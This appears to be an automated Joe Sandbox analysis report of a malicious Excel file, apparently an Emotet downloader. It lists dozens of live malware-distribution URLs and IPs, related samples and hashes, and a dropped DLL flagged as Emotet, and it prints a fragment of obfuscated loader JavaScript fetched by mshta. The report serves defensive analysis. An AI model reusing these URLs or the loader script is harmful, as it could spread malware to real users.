http://jurnalpjf.lan.go.id/asset	0%	Avira URL Cloud	safe
http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	100%	Avira URL Cloud	malware
http://bimesarayenovin.ir/wp-adm	100%	Avira URL Cloud	malware
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html	0%	Avira URL Cloud	safe
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	100%	Avira URL Cloud	malware
http://hostfeeling.com	100%	Avira URL Cloud	malware
http://daisy.sukoburu-secure.com	100%	Avira URL Cloud	malware
http://it-o.biz/	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlr	0%	Avira URL Cloud	safe
http://jurnalpjf.lan.go.id/assets/iM/	100%	Avira URL Cloud	malware
http://activetraining.sytes.net/	100%	Avira URL Cloud	malware
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	100%	Avira URL Cloud	malware
https://gudangtasorichina.com/wp-content/GG01c/PE3	100%	Avira URL Cloud	malware
https://gudangtasorichina.com/wp	0%	Avira URL Cloud	safe
http://daisy.suk	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlngs	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlmshta	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlWinSta0	0%	Avira URL Cloud	safe
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	100%	Avira URL Cloud	malware
https://property-eg.com/mlzkir/97v/PE3	100%	Avira URL Cloud	malware
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	100%	Avira URL Cloud	malware
https://property-eg.com/mlzkir/9	100%	Avira URL Cloud	malware
http://91.240.118.172	0%	Avira URL Cloud	safe
http://jurnalpjf.lan.go.id	0%	Avira URL Cloud	safe
http://www.protware.com	0%	URL Reputation	safe
http://activetraining.sytes.net/libraries/8s/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlfunction	0%	Avira URL Cloud	safe
http://totalplaytuxtla.com/sitio	0%	Avira URL Cloud	safe
http://maxtdeveloper.com/okw9yx/Gc28ZX/	100%	Avira URL Cloud	malware
http://it-o.biz/bitrix/xoDdDe/	100%	Avira URL Cloud	malware
https://gudangtasorichina.com/wp-content/GG01c/	100%	Avira URL Cloud	malware
http://totalplaytuxtla.com/sitio/DgktL3zd/	100%	Avira URL Cloud	malware
http://activetraining.sytes.net/libraries/8s/	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.p	0%	Avira URL Cloud	safe
http://gardeningfilm.com/wp-cont	100%	Avira URL Cloud	malware
http://jurnalpjf.lan.go.id/assets/iM/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlB	0%	Avira URL Cloud	safe
http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	100%	Avira URL Cloud	malware
http://bimesarayenovin.ir/wp-admin/G1pYGL/	100%	Avira URL Cloud	malware
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.html	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hostfeeling.com	164.90.147.135	true	false		unknown
jurnalpjf.lan.go.id	103.206.244.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.240.118.172/gg/ff/fe.png	true	Avira URL Cloud: malware	unknown
http://jurnalpjf.lan.go.id/assets/iM/	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.html	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://maxtdeveloper.com/okw9yx/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://it-o.biz/bitrix/xoDdDe/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.inablr.com/elenctic/f	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://hostfeeling.com/wp-admin/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://property-eg.com/mlzkir/97v/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.11	powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: safe	low
http://91.240.118.172/gg/ff/fe.pngPE3	powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://jurnalpjf.lan.go.id/asset	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://bimesarayenovin.ir/wp-adm	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html	mshta.exe, 00000004.00000003.411930557.0000000002855000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://hostfeeling.com	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://daisy.sukoburu-secure.com	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://it-o.biz/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlr	mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://activetraining.sytes.net/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://gudangtasorichina.com/wp-content/GG01c/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://gudangtasorichina.com/wp	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://daisy.suk	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlngs	mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlmshta	mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlWinSta0	mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://property-eg.com/mlzkir/97v/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://property-eg.com/mlzkir/9	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://jurnalpjf.lan.go.id	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.protware.com	mshta.exe, 00000004.00000003.410185425.000000000310D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436631636.00000000030E2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://activetraining.sytes.net/libraries/8s/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlfunction	mshta.exe, 00000004.00000003.412420079.000000000285D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://totalplaytuxtla.com/sitio	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://maxtdeveloper.com/okw9yx/Gc28ZX/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://it-o.biz/bitrix/xoDdDe/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000006.00000002.661371984.00000000000C0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gudangtasorichina.com/wp-content/GG01c/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://totalplaytuxtla.com/sitio/DgktL3zd/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://activetraining.sytes.net/libraries/8s/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.p	powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://gardeningfilm.com/wp-cont	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://jurnalpjf.lan.go.id/assets/iM/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlB	imedpub_8.xls.0.dr	true	Avira URL Cloud: safe	unknown
http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://bimesarayenovin.ir/wp-admin/G1pYGL/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
164.90.147.135	hostfeeling.com	United States	14061	DIGITALOCEAN-ASNUS	false
91.240.118.172	unknown	unknown	49453	GLOBALLAYERNL	true
103.206.244.105	jurnalpjf.lan.go.id	Indonesia	131111	CEPATNET-AS-IDPTMoraTelematikaIndonesiaID	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562400
Start date:	28.01.2022
Start time:	20:57:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	imedpub_8.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@9/8@2/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 16 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Execution Graph export aborted for target mshta.exe, PID 2804 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 800 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:58:17	API Interceptor	60x Sleep call for process: mshta.exe modified
20:58:20	API Interceptor	443x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
164.90.147.135	Opast Publishing Group_2.xls	Get hash	malicious	Browse	hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
	396439556866528615169447.xls	Get hash	malicious	Browse	hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
	INNOVINC_2.xls	Get hash	malicious	Browse	hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
	INNOVINC_3.xls	Get hash	malicious	Browse	hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
	SecuriteInfo.com.Heur.30985.xls	Get hash	malicious	Browse	hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
	Rech_2022_01.xls	Get hash	malicious	Browse	hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
	69587934636618461302.xls	Get hash	malicious	Browse	hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
	Fkus4gV8H5.xls	Get hash	malicious	Browse	hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
91.240.118.172	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse	91.240.118.172/cc/vv/fe.png
	iMedPub LTD_7.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	info_301.xls	Get hash	malicious	Browse	91.240.118.172/ee/ss/se.png
	InnovincConf_1.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	innovinc.org.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	Innovincconferences.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	Opast International.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	iMedPub LTD.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	opastonline.com.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	Ommega.xls	Get hash	malicious	Browse	91.240.118.172/cc/vv/fe.png
	Insight Medical Publishing_1.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	Insight Medical Publishing_2.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	Insight Medical Publishing_6.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	Insight Medical Publishing.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	OMICS International.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	SecuriteInfo.com.X97M.DownLoader.901.32695.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	omicsonline.net.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	OMICS Online_3.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png
	OMICS Publishing Group.xls	Get hash	malicious	Browse	91.240.118.172/gg/ff/fe.png

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
jurnalpjf.lan.go.id	iMedPub LTD_7.xls	Get hash	malicious	Browse	103.206.244.105
	InnovincConf_1.xls	Get hash	malicious	Browse	103.206.244.105
	innovinc.org.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse	103.206.244.105
	Innovincconferences.xls	Get hash	malicious	Browse	103.206.244.105
	Opast International.xls	Get hash	malicious	Browse	103.206.244.105
	iMedPub LTD.xls	Get hash	malicious	Browse	103.206.244.105
	opastonline.com.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing_1.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing_2.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing_6.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing.xls	Get hash	malicious	Browse	103.206.244.105
	OMICS International.xls	Get hash	malicious	Browse	103.206.244.105
	SecuriteInfo.com.X97M.DownLoader.901.32695.xls	Get hash	malicious	Browse	103.206.244.105
	omicsonline.net.xls	Get hash	malicious	Browse	103.206.244.105
	OMICS Online_3.xls	Get hash	malicious	Browse	103.206.244.105
	OMICS Publishing Group.xls	Get hash	malicious	Browse	103.206.244.105
hostfeeling.com	iMedPub LTD_7.xls	Get hash	malicious	Browse	164.90.147.135
	InnovincConf_1.xls	Get hash	malicious	Browse	164.90.147.135
	innovinc.org.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse	164.90.147.135
	Innovincconferences.xls	Get hash	malicious	Browse	164.90.147.135
	Opast International.xls	Get hash	malicious	Browse	164.90.147.135
	iMedPub LTD.xls	Get hash	malicious	Browse	164.90.147.135
	opastonline.com.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing_1.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing_2.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing_6.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing.xls	Get hash	malicious	Browse	164.90.147.135
	OMICS International.xls	Get hash	malicious	Browse	164.90.147.135
	SecuriteInfo.com.X97M.DownLoader.901.32695.xls	Get hash	malicious	Browse	164.90.147.135
	omicsonline.net.xls	Get hash	malicious	Browse	164.90.147.135
	OMICS Online_3.xls	Get hash	malicious	Browse	164.90.147.135
	OMICS Publishing Group.xls	Get hash	malicious	Browse	164.90.147.135
	Opast Publishing Group_2.xls	Get hash	malicious	Browse	164.90.147.135
	396439556866528615169447.xls	Get hash	malicious	Browse	164.90.147.135
	INNOVINC_2.xls	Get hash	malicious	Browse	164.90.147.135

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GLOBALLAYERNL	iMedPub LTD_10.xls	Get hash	malicious	Browse	91.240.118.168
	iMedPub LTD_12.xls	Get hash	malicious	Browse	91.240.118.168
	iMedPub LTD_14.xls	Get hash	malicious	Browse	91.240.118.168
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse	91.240.118.172
	iMedPub LTD_15.xls	Get hash	malicious	Browse	91.240.118.168
	iMedPub LTD_2.xls	Get hash	malicious	Browse	91.240.118.168
	iMedPub LTD_3.xls	Get hash	malicious	Browse	91.240.118.168
	iMedPub LTD_7.xls	Get hash	malicious	Browse	91.240.118.172
	iMedPub LTD_8.xls	Get hash	malicious	Browse	91.240.118.168
	imedpub.xls	Get hash	malicious	Browse	91.240.118.168
	info_301.xls	Get hash	malicious	Browse	91.240.118.172
	InnovincConf_1.xls	Get hash	malicious	Browse	91.240.118.172
	innovinc.org.xls	Get hash	malicious	Browse	91.240.118.172
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse	91.240.118.172
	Innovincconferences.xls	Get hash	malicious	Browse	91.240.118.172
	Opast International.xls	Get hash	malicious	Browse	91.240.118.172
	iMedPub LTD.xls	Get hash	malicious	Browse	91.240.118.172
	opastonline.com.xls	Get hash	malicious	Browse	91.240.118.172
	Ommega.xls	Get hash	malicious	Browse	91.240.118.172
	Insight Medical Publishing_1.xls	Get hash	malicious	Browse	91.240.118.172
DIGITALOCEAN-ASNUS	iMedPub LTD_10.xls	Get hash	malicious	Browse	162.243.175.63
	iMedPub LTD_12.xls	Get hash	malicious	Browse	162.243.175.63
	iMedPub LTD_14.xls	Get hash	malicious	Browse	162.243.175.63
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse	162.243.175.63
	iMedPub LTD_15.xls	Get hash	malicious	Browse	162.243.175.63
	iMedPub LTD_2.xls	Get hash	malicious	Browse	162.243.175.63
	iMedPub LTD_3.xls	Get hash	malicious	Browse	162.243.175.63
	iMedPub LTD_7.xls	Get hash	malicious	Browse	164.90.147.135
	iMedPub LTD_8.xls	Get hash	malicious	Browse	162.243.175.63
	imedpub.xls	Get hash	malicious	Browse	162.243.175.63
	info_301.xls	Get hash	malicious	Browse	128.199.192.135
	InnovincConf_1.xls	Get hash	malicious	Browse	164.90.147.135
	innovinc.org.xls	Get hash	malicious	Browse	164.90.147.135
	ANFg7r0v2A.dll	Get hash	malicious	Browse	162.243.175.63
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse	164.90.147.135
	Innovincconferences.xls	Get hash	malicious	Browse	164.90.147.135
	zb.dll	Get hash	malicious	Browse	162.243.175.63
	9vn5uo9AGs0AM.dll	Get hash	malicious	Browse	162.243.175.63
	irtW.dll	Get hash	malicious	Browse	162.243.175.63
	FMPeUASgI.dll	Get hash	malicious	Browse	162.243.175.63

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.9805129193387385
Encrypted:	false
SSDEEP:	12288:B2AavzUBPSczbeeTLjvWyMwWd3DYr6i64/:OUBPSczbeeTnvqZDWA
MD5:	0EA8275E9959D13E2DAE61B507BEFD0B
SHA1:	CBDBC5CC68469D500B9D2BEF0A5EFD7BCD2F9663
SHA-256:	3FD5FF9B3428C603D79CFDFB8C11C7AFCABE8F575B09BE5946BE4C413DAFC83B
SHA-512:	6ADB7CE585061A813765FED1A1800587A495D2060888B05CE98CA0CAE79400930479BF830D598EE236D6BC0B2D16F5F21034ED58921B66FE2715B00F79506788
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	downloaded
Size (bytes):	11054
Entropy (8bit):	6.200485074224619
Encrypted:	false
SSDEEP:	192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
MD5:	DD20B97330028BCB6BF98D97C47028D9
SHA1:	D58D97589A97FBD3B1216ED76C4918113F4B7B25
SHA-256:	4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
SHA-512:	AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
Malicious:	false
Reputation:	moderate, very likely benign file
IE Cache URL:	http://91.240.118.172/gg/ff/fe.html
Preview:	.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'}..\\.1.6.2.%.2.0}

C:\Users\user\AppData\Local\Temp\32B4.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3B12D0E9CF2F0062.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9DFA6BFBFA953BEE.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	3.5189161831469296
Encrypted:	false
